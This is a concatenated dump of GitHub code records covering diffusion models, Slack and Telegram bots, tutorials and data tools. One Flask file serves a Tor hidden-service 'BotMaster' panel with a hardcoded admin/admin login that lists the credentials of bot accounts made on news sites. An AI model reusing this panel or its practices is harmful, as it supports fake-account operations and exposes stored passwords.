self.register(\"sqrt_recipm1_alphas_cumprod\", paddle.sqrt(1 / alphas_cumprod - 1))\r\n self.register(\"posterior_variance\", posterior_variance)\r\n self.register(\r\n \"posterior_log_variance_clipped\",\r\n paddle.log(posterior_variance.clip(min=1e-20)),\r\n )\r\n self.register(\r\n \"posterior_mean_coef1\",\r\n (betas * paddle.sqrt(alphas_cumprod_prev) / (1 - alphas_cumprod)),\r\n )\r\n self.register(\r\n \"posterior_mean_coef2\",\r\n ((1 - alphas_cumprod_prev) * paddle.sqrt(alphas) / (1 - alphas_cumprod)),\r\n )\r\n\r\n def register(self, name, tensor):\r\n self.register_buffer(name, tensor.astype(np.float32))\r\n\r\n def q_sample(self, x_0, t, noise=None):\r\n if noise is None:\r\n noise = paddle.randn_like(x_0)\r\n\r\n return (\r\n extract(self.sqrt_alphas_cumprod, t, x_0.shape) * x_0\r\n + extract(self.sqrt_one_minus_alphas_cumprod, t, x_0.shape) * noise\r\n )\r\n\r\n def p_loss(self, model, x_0, t, noise=None):\r\n if noise is None:\r\n noise = paddle.randn(x_0.shape)\r\n\r\n x_noise = self.q_sample(x_0, t, noise)\r\n x_recon = model(x_noise, t)\r\n\r\n return F.mse_loss(x_recon, noise)\r\n\r\n def predict_start_from_noise(self, x_t, t, noise):\r\n return (\r\n extract(self.sqrt_recip_alphas_cumprod, t, x_t.shape) * x_t\r\n - extract(self.sqrt_recipm1_alphas_cumprod, t, x_t.shape) * noise\r\n )\r\n\r\n def q_posterior(self, x_0, x_t, t):\r\n mean = (\r\n extract(self.posterior_mean_coef1, t, x_t.shape) * x_0\r\n + extract(self.posterior_mean_coef2, t, x_t.shape) * x_t\r\n )\r\n var = extract(self.posterior_variance, t, x_t.shape)\r\n log_var_clipped = extract(self.posterior_log_variance_clipped, t, x_t.shape)\r\n\r\n return mean, var, log_var_clipped\r\n\r\n def p_mean_variance(self, model, x, t, clip_denoised):\r\n x_recon = self.predict_start_from_noise(x, t, noise=model(x, t))\r\n\r\n if clip_denoised:\r\n x_recon = x_recon.clip(min=-1, max=1)\r\n\r\n mean, var, log_var = self.q_posterior(x_recon, x, t)\r\n\r\n return mean, var, log_var\r\n\r\n def p_sample(self, model, x, t, noise_fn, clip_denoised=True, repeat_noise=False):\r\n mean, _, log_var = self.p_mean_variance(model, x, t, clip_denoised)\r\n noise = noise_like(x.shape, noise_fn, repeat_noise)\r\n shape = [x.shape[0]] + [1] * (x.ndim - 1)\r\n nonzero_mask = (1 - (t == 0).astype(np.float32)).reshape(shape)\r\n\r\n return mean + nonzero_mask * paddle.exp(0.5 * log_var) * noise\r\n\r\n @paddle.no_grad()\r\n def p_sample_loop(self, model, shape, noise_fn=paddle.randn):\r\n img = noise_fn(shape)\r\n\r\n for i in reversed(range(self.num_timesteps)):\r\n img = self.p_sample(\r\n model,\r\n img,\r\n paddle.full((shape[0],), i, dtype=np.int64),\r\n noise_fn=noise_fn,\r\n )\r\n\r\n return img\r\n","repo_name":"HighCWu/denoising-diffusion-paddle","sub_path":"diffusion.py","file_name":"diffusion.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"81"} +{"seq_id":"6407331920","text":"from collections import Counter\nimport threading,time,os,queue\n \nclass ThreadPool(object):\n def __init__(self,maxsize):\n self.maxsize = maxsize\n self._q = queue.Queue(self.maxsize)\n for i in range(self.maxsize):\n self._q.put(threading.Thread)\n \n def getThread(self):\n return self._q.get()\n \n def addThread(self):\n self._q.put(threading.Thread)\n \ndef fun(num,p):\n print('this is thread [%s]'%num)\n time.sleep(1)\n p.addThread()\n \n \nif __name__ == '__main__':\n pool = ThreadPool(2)\n for i in range(103):\n t = pool.getThread()\n a = t(target = fun,args 
= (i,pool))\n a.start()","repo_name":"aboutmydreams/jiaowu","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40926192028","text":"class Pets:\n name = \"pets\"\n\n @classmethod\n def about(cls):\n print(\"This class is about {0}!\".format(cls.name))\n\n\nclass Dogs(Pets):\n name = \"dogs\"\n\n\nclass Cats(Pets):\n name = \"cats\"\n\n\np = Pets()\np.about()\n\nd = Dogs()\nd.about()\n\nc = Cats()\nc.about()\n","repo_name":"serdarayalp/my-python","sub_path":"class_classmethod.py","file_name":"class_classmethod.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71544145224","text":"my_list = []\nmy_list = list()\n\nmy_list = [1, 2, 3]\nmy_list2 = [\"a\", \"b\", \"c\"]\nmy_list3 = [\"a\", 1, \"Python\", 5]\n\ncombo_list = []\none_list = [4, 5]\ncombo_list.extend(one_list)\n#print(combo_list)\n\nmy_list = [1, 2, 3]\nmy_list2 = [\"a\", \"b\", \"c\"]\ncombo_list = my_list + my_list2\n#print(combo_list)\n\nalpha_list = [34, 23, 67, 100, 88, 2]\nsorted_list = alpha_list.sort()\n#print(sorted_list)\n\n\n# Tuples are immutable like a constant list\nmy_tuple = (1, 2, 3, 4, 5)\nanother_tuple = tuple()\nabc = tuple([1, 2, 3])\nabc_list = list(abc)\n\nmy_car = {\n \"color\": \"red\",\n \"maker\": \"Toyota\",\n \"year\": 2015\n }\n\nprint(my_car[\"color\"])","repo_name":"CihatKOCAK/AI-101","sub_path":"python/part_I/lists_tuples_dictionaries.py","file_name":"lists_tuples_dictionaries.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17285963695","text":"#!/usr/bin/python3\n\"\"\"\nThis is the Red Hat Customer Portal API poller, to query for the cases\n\"\"\"\nimport sys\nimport urllib.request\nfrom pprint import pformat\nimport concurrent.futures\nimport logging\nimport time\nimport xmltodict\nimport bot\nimport config\nimport db\n\n#logging.basicConfig(\n# format='%(asctime)s %(levelname)-8s %(message)s',\n# level=logging.DEBUG,\n# datefmt='%Y-%m-%d %H:%M:%S')\n#logger = logging.getLogger(__name__)\nlogger = logging.getLogger('RedHatAPI')\nformatter = logging.Formatter(\n '%(asctime)s (%(filename)s:%(lineno)d %(threadName)s) %(levelname)s - %(name)s: \"%(message)s\"'\n)\nrhapilogger = logging.StreamHandler(sys.stderr)\nrhapilogger.setFormatter(formatter)\nlogger.addHandler(rhapilogger)\n#logger.FileHandler('tickets-pushbot.log')\n\nlogger.setLevel(logging.ERROR)\nlogger.setLevel(logging.DEBUG)\n\n\n\nclass HTTPLoginFailed(Exception):\n \"\"\"Declare the exception to be used outside of this module\"\"\"\n def __init__(self, username):\n self.username = username\n Exception.__init__(self, 'Wrong username or password exception for user %s' % username)\n\n\ndef casepoller(event):\n \"\"\"\n Main class, iterate over the database.\n Open a thread for each user configured.\n Each thread will modify the database.\n A final version of the database will be written on the disk.\n \"\"\"\n\n while True:\n try:\n logger.info(\"case poller started\")\n if event.is_set():\n logger.info(\"event received, stopping the thread\")\n break\n pollerthread = concurrent.futures.ProcessPoolExecutor()\n db.dictdb = dict(pollerthread.map(casesiterator, db.dictdb.items()))\n pollerthread.shutdown(wait=True)\n # race condition, what if we save a new user whike this function is running?\n 
db.savejson(config.dbfile, db.dictdb)\n logger.info(\"case poller standby for the next iteration, sleeping for \" + str(config.rhpollertimeout) + \" seconds\")\n time.sleep(config.rhpollertimeout)\n except:\n e = sys.exc_info()[0]\n logger.error(\"error: \" + e)\n\ndef casesiterator(chat_id_tuple):\n \"\"\"\n Per user thread.\n The thread will be evaluated and for every case the parsing will be started\n \"\"\"\n # the tuple must be splittted between the chat_id (user id in telegram) and the associated configuration dict\n chat_id, user_dict = chat_id_tuple\n logger.info(\"chatid: \" + chat_id + \", parsing the following database\\n\" + pformat(chat_id_tuple, depth=3))\n # verify that the user has a valid configuration\n if not db.checkuserconfiguration(chat_id, db.dictdb):\n logger.info(\"chatid: \" + chat_id + \", no valid configuration for the user\")\n else:\n # if notify index is not set, assign the default value\n if not \"notify\" in user_dict:\n user_dict[\"notify\"] = [\"Associate\"]\n # start the real parsing, checking if cases index is set\n # once a user add himself, the index is *not* set\n if \"cases\" in user_dict and user_dict[\"cases\"] is not None:\n # extract the case number and the relative hash (xml dump) associated\n for casenumber, casedump in user_dict[\"cases\"].items():\n logger.info(\"chatid: \" + chat_id + \", case \" + casenumber + \", a valid configuration has been found. The case parsing is going to be executed.\")\n # case is an hash, the key is the case number, the value is an hash.\n # the hash has None value once added, the case xml afterward\n # parsecase function will be called for every case\n user_dict[\"cases\"][casenumber] = parsecase(chat_id, casenumber, casedump, user_dict[\"credentials\"], user_dict[\"notify\"])\n else:\n logger.info(\"chatid: \" + chat_id + \", no cases hash has been found for the user\")\n\n # always return a value, which can be the original one or the modified one\n return str(chat_id), user_dict\n\n\ndef parsecase(chat_id, casenumber, storedcase, credentials, notify):\n \"\"\"\n case parser.\n The online case will be extracted and compared with the saved case.\n If there is a new comment matching the requirements, this will be sent.\n In any case return the dict to replace the current value.\n \"\"\"\n logger.debug(\"chatid: \" + chat_id + \", case \" + casenumber + \", parsing started.\")\n\n # extract the last comment dict\n onlinecase = loadcase(casenumber, credentials, notify)\n # check if there is a comment\n if onlinecase is None:\n # there are still no comments, continue\n logger.info(\"chatid: \" + chat_id + \", case \" + casenumber + \", no comment has been made in the case. Skipping further checks.\")\n return None\n # lastModifiedDate must be of the comment, not of the case. 
Otherwise every comment will trigger a notification.\n if storedcase is not None and 'lastcomment' in storedcase and onlinecase[\"lastcomment\"].get('lastModifiedDate') == storedcase[\"lastcomment\"].get('lastModifiedDate'):\n # if the comment retireve is the same stored, just continue to the next case\n logger.info(\"chatid: \" + chat_id + \", case \" + casenumber + \", the saved comment is the same as the latest comment in the Customer Portal\")\n return storedcase\n\n if \"text\" in onlinecase['lastcomment']:\n try:\n caseupdate = onlinecase['lastcomment'].get(\"text\")\n logger.info(caseupdate)\n logger.info(\"chatid: \" + chat_id + \", case \" + casenumber + \", sending update via telegram\")\n caseupdatestrip = (caseupdate[:1000] + '\\n[...]') if len(caseupdate) > 1000 else caseupdate\n # notify the user via telegram\n bot.pushmessage(chat_id, \"Case \" + onlinecase.get('@caseNumber') + \"\\n\" + onlinecase.get('summary') + \"\\n\" + onlinecase.get('status') + \"\\n```\\n\" + caseupdatestrip + \"\\n```\")\n logger.debug(\"chatid: \" + chat_id + \", case \" + casenumber + \", the update has been sent via telegram\")\n except Exception as e:\n logger.error(\"case \" + case + \", Exception parsing the comments, error:\\n\" + repr(e) + \"\\ncomments array:\\n\" + repr(comments) + \"\\nlastcomment parsed:\\n\" + repr(lastcomment))\n else:\n raise ValueError(\"no [lastcomment][text] for case \" + casenumber)\n #return None\n\n # return the updated case dict\n return onlinecase\n\n\ndef loadcase(case, credentials, notify):\n \"\"\"\n Load the case from Red Hat Customer Portal and parse it according to the user configuration\n \"\"\"\n # set the url for the case retrieval\n url = config.fqdn + \"/rs/cases/\" + case\n\n # request the updated online configuration\n res_body = rhquery(credentials[\"username\"], credentials[\"password\"], url)\n\n # create a dict from the XML\n case_dict = xmltodict.parse(res_body.decode('utf-8'))\n logger.debug(\"loadcase() case: \" + case + \", case_dict\\n\" + pformat(case_dict))\n\n # if [\"comments\"][\"comment\"] key does not exist, the first reply is still missing\n if case_dict['case']['comments'] is None or not \"comment\" in case_dict['case']['comments']:\n # return None to continue the parsing without this case number\n return None\n\n # extract the comments from the structure\n # the expected output is a list of OrderedDict in ['case']['comments']['comment']\n # the order is newer to older comments\n comments = case_dict['case']['comments']['comment']\n\n # if only one element is found, an OrderedDict is returned.\n # if more then one element is found, a List is returned.\n # fixing the type always to list.\n if(type(comments) is not list):\n comments = list([comments])\n\n # initialize the return value for the iteration\n lastcomment = dict()\n # create an iterator -- next is needed to get the first index\n commentsiter = iter(comments)\n\n # iterate over the retrieved dict\n try:\n while True:\n # extract the next comment from the structure\n lastcomment = next(commentsiter)\n # check if we have a real comment, on the first iteration no\n if lastcomment.get('@id') is None:\n logger.info(\"case \" + case + \", empty\")\n continue\n # notify is a list, default value [\"Associate\"]\n # check if the Type that posted the comment is matching the deired one\n if lastcomment.get('createdByType') in notify:\n # the comment is matching, exiting from the loop\n logger.info(\"case \" + case + \", found comment id \" + lastcomment[\"@id\"])\n break\n else:\n # 
extract the next comment from the structure and restart the loop\n logger.debug(\"case \" + case + \", NOT suitable comment id \" + lastcomment[\"@id\"])\n # This exception means that there are no further comments in the iter\n except StopIteration:\n logger.info(\"case \" + case + \", no suitable comments has been found, exiting from the function\")\n return None\n # a general exception handler\n except Exception as e:\n logger.error(\"case \" + case + \", Exception parsing the comments, error:\\n\" + repr(e) + \"\\ncomments array:\\n\" + repr(comments) + \"\\nlastcomment parsed:\\n\" + repr(lastcomment))\n\n # create the return value\n complete_case = case_dict['case']\n complete_case['lastcomment'] = lastcomment\n\n return complete_case\n\n\ndef rhquery(auth_user, auth_pass, url):\n \"\"\"\n Do the effective query to Red Hat Customer Portal, and retrieve the output\n The result xml will be returned\n \"\"\"\n # If you would like to request Authorization header for Digest Authentication,\n # replace HTTPBasicAuthHandler object to HTTPDigestAuthHandler\n passman = urllib.request.HTTPPasswordMgrWithDefaultRealm()\n passman.add_password(None, url, auth_user, auth_pass)\n authhandler = urllib.request.HTTPBasicAuthHandler(passman)\n opener = urllib.request.build_opener(authhandler)\n urllib.request.install_opener(opener)\n\n # get the case xml\n try:\n res = urllib.request.urlopen(url)\n except urllib.error.HTTPError as e:\n raise HTTPLoginFailed(auth_user)\n except Exception as e:\n logger.exception(repr(message) + repr(e))\n res_body = res.read()\n\n return res_body\n","repo_name":"Rocco83/tickets-pushbot","sub_path":"rhapi.py","file_name":"rhapi.py","file_ext":"py","file_size_in_byte":10295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33932073839","text":"\n\nimport re\n\ndef min_and_max(iterable):\n iterator = iter(iterable)\n\n # Assumes at least two items in iterator\n minim, maxim = sorted((next(iterator), next(iterator)))\n\n for item in iterator:\n if item < minim:\n minim = item\n elif item > maxim:\n maxim = item\n\n return (minim, maxim)\n\n\nwith open('gen_20', 'r') as f:\n g = (re.search(r'Fitness: [-+]?[0-9]*\\.?[0-9]*',line,re.I) for line in f) \n values = (float(v.group(1)) for v in g)\n minim, maxim = min_and_max(values)\n\nprint(maxim)\nprint(minim)","repo_name":"sanchitanand/SnakeNeuralNetworks","sub_path":"fitness_finder.py","file_name":"fitness_finder.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22230562986","text":"from django_cron import CronJobBase, Schedule\nfrom django.utils import timezone\n\nfrom datetime import timedelta\n\nfrom crossbot.util import comma_and\nfrom crossbot.models import MiniCrosswordTime, CBUser\nfrom crossbot.slack.api import post_message\nimport crossbot.predictor as predictor\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass ReleaseAnnouncement(CronJobBase):\n schedule = Schedule(run_at_times=['15:00', '19:00'])\n code = 'crossbot.release_announcement'\n\n def should_run_now(self, time):\n if time.isoweekday() in (6, 7): # It's Saturday or Sunday\n return 14 <= time.hour <= 15\n else:\n return 18 <= time.hour <= 19\n\n def format_message(self, announce_data):\n msgs = ['Good evening crossworders!']\n msgs += [\n '{u} is on a {n}-day win streak! 
{emoji}'.format(\n u=u, n=len(streak), emoji=':fire:' * len(streak)\n ) for u, streak in announce_data['streaks']\n ]\n\n # now add the other winners\n also = ' also' if announce_data['streaks'] else ''\n if announce_data['winners_today']:\n msgs.append(\n comma_and(announce_data['winners_today']) + also + ' won.'\n )\n if announce_data['winners_yesterday']:\n msgs.append(\n comma_and(announce_data['winners_yesterday']) + also +\n ' won yesterday.'\n )\n if announce_data['overperformers']:\n users = [\n u + (\n \" \" + \":chart_with_upwards_trend:\" * int(-i)\n if i <= -1 else \"\"\n ) for u, i in announce_data['overperformers']\n ]\n msgs.append(comma_and(users) + ' did really well today!')\n if announce_data['difficulty'] > 1:\n diff = int(announce_data['difficulty'])\n msgs.append(\"Oof, that was a tough mini! \" + diff * \":open_mouth:\")\n msgs.append(\"Play tomorrow's:\")\n for game in announce_data['links']:\n msgs.append(\"{} : {}\".format(game, announce_data['links'][game]))\n\n return '\\n'.join(msgs)\n\n def do(self):\n now = timezone.localtime()\n if self.should_run_now(now):\n announce_data = MiniCrosswordTime.announcement_data(now)\n message = self.format_message(announce_data)\n # TODO dont hardcode\n channel = 'C58PXJTNU'\n response = post_message(channel, {'text': message})\n return \"Ran release announcement at {}\\n{}\".format(now, message)\n return \"Did not run release announcement at {} (hour={})\".format(\n now, now.hour\n )\n\n\nclass MorningAnnouncement(CronJobBase):\n schedule = Schedule(run_at_times=['08:30'])\n code = 'crossbot.morning_announcement'\n\n def format_message(self, announce_data):\n msgs = ['Good morning crossworders!']\n\n msgs += [\n '{u} is currently on a {n}-day win streak! {emoji}'.format(\n u=u, n=len(streak), emoji=':fire:' * len(streak)\n ) for u, streak in announce_data['streaks']\n ]\n\n # now add the other winners\n also = ' also' if announce_data['streaks'] else ''\n if announce_data['winners_today']:\n is_are = 'are' if len(announce_data['winners_today']) > 1 else 'is'\n msgs.append(\n '{} {}{} winning'.format(\n comma_and(announce_data['winners_today']), is_are, also\n )\n )\n if announce_data['winners_yesterday']:\n msgs.append(\n comma_and(announce_data['winners_yesterday']) + also +\n ' won yesterday.'\n )\n msgs.append(\"Think you can beat them? 
Play today's:\")\n for game in announce_data['links']:\n msgs.append(\"{} : {}\".format(game, announce_data['links'][game]))\n\n return '\\n'.join(msgs)\n\n def do(self):\n now = timezone.localtime()\n announce_data = MiniCrosswordTime.announcement_data(now)\n message = self.format_message(announce_data)\n # TODO dont hardcode\n channel = 'C58PXJTNU'\n response = post_message(channel, {'text': message})\n return \"Ran morning announcement at {}\\n{}\".format(now, message)\n\n\nclass Predictor(CronJobBase):\n schedule = Schedule(run_every_mins=60)\n code = 'crossbot.predictor.infer'\n\n def do(self):\n data = predictor.data()\n fit = predictor.fit(data, quiet=True)\n model = predictor.extract_model(data, fit)\n predictor.save(model)\n historic, dates, users, params = model\n return \"Ran the predictor at {}\".format(params.when_run)\n\n\nclass SlacknameUpdater(CronJobBase):\n schedule = Schedule(run_at_times=['2:00'])\n code = 'crossbot.update_slacknames'\n\n def do(self):\n now = timezone.localtime()\n CBUser.update_slacknames()\n return \"Updated slack_users at {}\".format(now)\n","repo_name":"mwillsey/crossbot","sub_path":"crossbot/cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":4957,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"81"} +{"seq_id":"13076466008","text":"import pandas as pd\nimport numpy as np\nimport scipy.interpolate\n\nclass SimpleAcceptReject() :\n\n def __init__(self,\n targetDistData,\n sampleDistData,\n numBins,\n targetColumnName,\n sampleColumnName,\n rejectionEfficiency=10) :\n\n self.distData = {'target' : targetDistData if isinstance(targetDistData, pd.DataFrame) else None,\n 'sample' : sampleDistData if isinstance(sampleDistData, pd.DataFrame) else None }\n\n self.columnName = {'target' : targetColumnName if isinstance(targetColumnName, str) else None,\n 'sample' : sampleColumnName if isinstance(sampleColumnName, str) else targetColumnName }\n\n self.distHisto = {'target' : None, 'sample' : None}\n self.distHistoBins = {'target' : None, 'sample' : numBins if isinstance(numBins, int) else None }\n\n self.distFrame = {'target' : None, 'sample' : None}\n self.distSpline = {'target' : None, 'sample' : None}\n\n self.pdfFrameColNames = ['density', 'bin_low_edge', 'bin_high_edge', 'bin_centre']\n\n self.resampledDistFrame = None\n\n self.rejectionEfficiency = rejectionEfficiency\n\n def genProbDist(self, key) :\n print ('Generating probability disribution for {}...'.format(key))\n self.distHisto[key] = np.histogram(self.distData[key][self.columnName[key]].values,\n bins=self.distHistoBins[key],\n density = True)\n self.distFrame[key] = pd.DataFrame([(*zipped, 0.5*(zipped[1]+zipped[2])) for zipped in zip(self.distHisto[key][0], self.distHisto[key][1][0:-1], self.distHisto[key][1][1:])],\n columns=self.pdfFrameColNames)\n self.distSpline[key] = scipy.interpolate.UnivariateSpline(self.distFrame[key]['bin_centre'].values, self.distFrame[key]['density'].values, s=0)\n if key == 'sample' :\n self.distHistoBins['target'] = self.distHisto[key][1]\n\n def genResampledDistribution(self) :\n print ('Generating resampled distribution...')\n while len(self.resampledDistFrame.index) < len(self.distData['target'].index) :\n # select a random sample of rows from the illustris dataset (select more than we need)\n fullSample = self.distData['sample'].sample(1000)\n # generate the same number of random uniform variates\n uniformVariates = np.random.uniform(size=1000)\n # generate pdf values for the stellar masses 
corresponding to each of the samples\n targetPdfVals = self.distSpline['target'](fullSample[self.columnName['sample']])\n samplePdfVals = self.distSpline['sample'](fullSample[self.columnName['sample']])\n pdfRatioVals = targetPdfVals/(self.rejectionEfficiency*samplePdfVals)\n # select only those rows of the sample that fulfil the acceptance criterion\n filteredSample = fullSample[uniformVariates <= pdfRatioVals]\n self.resampledDistFrame = pd.concat([self.resampledDistFrame,filteredSample], ignore_index=True)\n print ('Done.')\n\n def getResampledDataset(self) :\n # initialization of probability distributions\n for key in ['sample', 'target'] :\n if self.distData[key] is not None and self.columnName[key] is not None and self.distHistoBins[key] is not None :\n self.genProbDist(key)\n # initialization of output resampled distribution\n self.resampledDistFrame = pd.DataFrame(columns=self.distData['target'].columns)\n self.genResampledDistribution()\n return self.resampledDistFrame\n","repo_name":"AstroZooMin/HughDickinsonMisc","sub_path":"SloanIllustrisNotebooks/PandasResampling.py","file_name":"PandasResampling.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"70710383305","text":"import os\nimport shutil\nfrom docutils.nodes import table, author\nfrom hgext.fsmonitor.pywatchman import client\n\nfrom db import cryptoDB\n\n\nfrom stem.control import Controller\nfrom flask import Flask, flash, redirect, render_template, request, session, abort\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n if not session.get('logged_in'):\n return render_template('login.html')\n else:\n return 'Hi BotMaster:) Logout'\n\ndef show_tables():\n tables = {'elmundo', 'eldiario'}\n out = \"\"\n out += \"

Bot list

\"\n out += ''\n out += '

Hi BotMaster! Logout

'\n\n for table_name in tables:\n rows = cryptoDB.get_all_users(table_name)\n out += \"

Bots created in \" + table_name + \"

\"\n out += '
'\n out += ''\n out += \" \"\n out += \" \"\n out += \" \"\n out += \" \"\n out += \" \"\n out += \" \"\n out += \" \"\n out += \" \"\n\n for row in rows:\n out += \"\"\n for i in range(0,4):\n out += \"\"\n out += \"\"\n out += \" \"\n out += \"
User IDUsernamePwdE-mail
\" + str(row[i]) + \"
\"\n out += \"
\"\n\n return out\n\n# Route for handling the login page logic\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n error = None\n if request.method == 'POST':\n if request.form['username'] != 'admin' or request.form['password'] != 'admin':\n error = 'Invalid Credentials. Please try again.'\n else:\n return show_tables()\n return render_template('login.html', error=error)\n\n\n@app.route(\"/logout\")\ndef logout():\n def logout():\n session['logged_in'] = False\n\n return index()\n\nprint(' * Connecting to tor')\n\nwith Controller.from_port() as controller:\n controller.authenticate()\n\n # All hidden services have a directory on disk. Lets put ours in tor's data\n # directory.\n\n hidden_service_dir = os.path.join(controller.get_conf('DataDirectory', '/tmp'), 'hello_world')\n\n # Create a hidden service where visitors of port 80 get redirected to local\n # port 5000 (this is where Flask runs by default).\n\n print(\" * Creating our hidden service in %s\" % hidden_service_dir)\n result = controller.create_hidden_service(hidden_service_dir, 80, target_port = 5000)\n\n # The hostname is only available when we can read the hidden service\n # directory. This requires us to be running with the same user as tor.\n\n if result.hostname:\n print(\" * Our service is available at %s, press ctrl+c to quit\" % result.hostname)\n else:\n print(\" * Unable to determine our service's hostname, probably due to being unable to read the hidden service directory\")\n\n try:\n app.run()\n finally:\n # Shut down the hidden service and clean it off disk. Note that you *don't*\n # want to delete the hidden service directory if you'd like to have this\n # same *.onion address in the future.\n\n print(\" * Shutting down our hidden service\")\n controller.remove_hidden_service(hidden_service_dir)\n shutil.rmtree(hidden_service_dir)\n","repo_name":"kikoas1995/smartBot","sub_path":"hiddenService.py","file_name":"hiddenService.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"74286298503","text":"\"\"\"\n Describe what we need to do before commit is complete\n\"\"\"\n\n\nfrom pathlib import Path\nimport subprocess\nimport sys\nfrom sftp_uploader.services.applications.sftp_uploader import update_files\n\nfrom sftp_uploader.services.exceptions.pre_commit_actions import CannotActivatePythonVenv\n\n\ndef setup_env():\n\n activate_this_script = 'venv/bin/activate'\n\n if Path(activate_this_script).absolute().exists():\n activate_script = f\"{activate_this_script}\"\n command = f\"source {activate_script}; {sys.executable}\"\n subprocess.run(command, \n shell=True,\n check=True)\n\n else:\n raise CannotActivatePythonVenv\n\n\ndef pre_commit_actions():\n setup_env()\n update_files()\n\n\n","repo_name":"moonvent/sftp_uploader","sub_path":"sftp_uploader/applications/pre_commit_actions.py","file_name":"pre_commit_actions.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36212276546","text":"#!/usr/bin/env python\r\nimport os\r\nimport numpy as np\r\nimport pandas as pd\r\nimport re\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.patches as patches\r\nfrom sklearn.neighbors import KernelDensity\r\n\r\nVERSION = '1.0.0'\r\n\r\nprint('\\ncytoShapeNet v.' + VERSION)\r\nprint('© 2018-2020 Dr. 
Stephan Quint & Konrad Hinkelmann')\r\nprint('info@cytoshape.net\\n\\n')\r\n\r\n# make use of longer loading imports for displaying the info text\r\nimport seaborn as sns\r\nfrom keras.models import model_from_json\r\n\r\n\r\n__doc__ = 'Evaluation part of cytoShapeNet' \\\r\n '===============================' \\\r\n '' \\\r\n 'This script uses the neural networks created in the previous training part to predict and plot cell data ' \\\r\n 'from \"PATH\".'\r\n__author__ = 'Stephan Quint, Konrad Hinkelmann'\r\n__copyright__ = 'Copyright © 2018-2020, cytoShapeNet'\r\n__credits__ = ['Stephan Quint, Konrad Hinkelmann, Greta Simionato, Revaz Chachanidze, Paola Bianchi, Elisa Fermo,'\r\n 'Richard van Wijk, Christian Wagner, Lars Kaestner, Marc Leonetti']\r\n__license__ = 'GPL'\r\n__version__ = VERSION\r\n__email__ = 'info@cytoshape.net'\r\n\r\n\r\n# constants\r\nALT_LABELS = True\r\nALT_LABEL_VALUES = ['SDE', 'CC', 'KE', 'KN', 'ML', 'AC', 'U']\r\nCONFUSION_THRESHOLD = 0.75\r\n\r\n# this script will be called from the root directory .bat file, where the \"PATH\", \"NN_PATH\" folders are located\r\nDATA_PATH = 'data\\\\evaluation\\\\'\r\nNN_PATH = 'nn\\\\'\r\nFONT = {'fontname': 'DejaVu Sans', 'fontsize': '9'}\r\nFONT_SMALL = {'fontname': 'DejaVu Sans', 'fontsize': '7'}\r\nFONT_SMALL_ITALIC = {'fontname': 'DejaVu Sans', 'fontsize': '7', 'fontstyle': 'italic'}\r\nPLOT_COLORS = ['darkblue', 'darkred', 'darkgreen', 'darkorange']\r\n\r\n\r\n# forcing Keras / Tensorflow to run on CPU to get reproducible results\r\nos.environ['CUDA_VISIBLE_DEVICES'] = '-1'\r\n\r\nsns.set_style('darkgrid', {'axes.facecolor': '.9'})\r\nplot_color_idx = 0\r\nprocessed_cell_count = 0\r\n\r\n\r\ndef file_to_list(filename):\r\n file_handle = open(filename, 'r')\r\n out_list = []\r\n for line in file_handle.readlines():\r\n out_list.append(line.replace('\\n', ''))\r\n file_handle.close()\r\n return out_list\r\n\r\n\r\ndef mm2inch(value):\r\n return value / 25.4\r\n\r\n\r\ndef find_nearest(array, value):\r\n array = np.asarray(array)\r\n nearest_idx = (np.abs(array - value)).argmin()\r\n return array[nearest_idx]\r\n\r\n\r\ndef convert_digits(text):\r\n if text.isdigit():\r\n text = int(text)\r\n return text\r\n\r\n\r\ndef sort_alphanumerically(input_list):\r\n alphanum_key = lambda key: [convert_digits(c) for c in re.split('([0-9]+)', key)]\r\n return sorted(input_list, key=alphanum_key)\r\n\r\n\r\n\r\nfor directory in os.listdir(DATA_PATH):\r\n data_directory = DATA_PATH + directory + '\\\\'\r\n if os.path.isdir(data_directory):\r\n # compute all folders (separately) in the \"DATA_PATH\" directory\r\n data_collection = {}\r\n # different plot color for each folder\r\n plot_color = PLOT_COLORS[plot_color_idx % len(PLOT_COLORS)]\r\n # load all data from data_directory\r\n for root, directories, files in os.walk(data_directory):\r\n for file in files:\r\n if file.endswith('.dat'):\r\n # remove 'data\\'\r\n input_folder = os.path.basename(root)\r\n # load data\r\n print('Loading: ' + os.path.join(root, file))\r\n data = np.loadtxt(os.path.join(root, file), skiprows=1)\r\n # normalize data\r\n data /= np.max(abs(data))\r\n if not (input_folder in data_collection):\r\n data_collection[input_folder] = []\r\n data_collection[input_folder].append(data)\r\n\r\n # load classification NN\r\n json_file = open(NN_PATH + 'classification_NN.json', 'r')\r\n classification_model = model_from_json(json_file.read())\r\n json_file.close()\r\n classification_model.load_weights(NN_PATH + 'classification_NN.h5')\r\n\r\n # load regression NN\r\n 
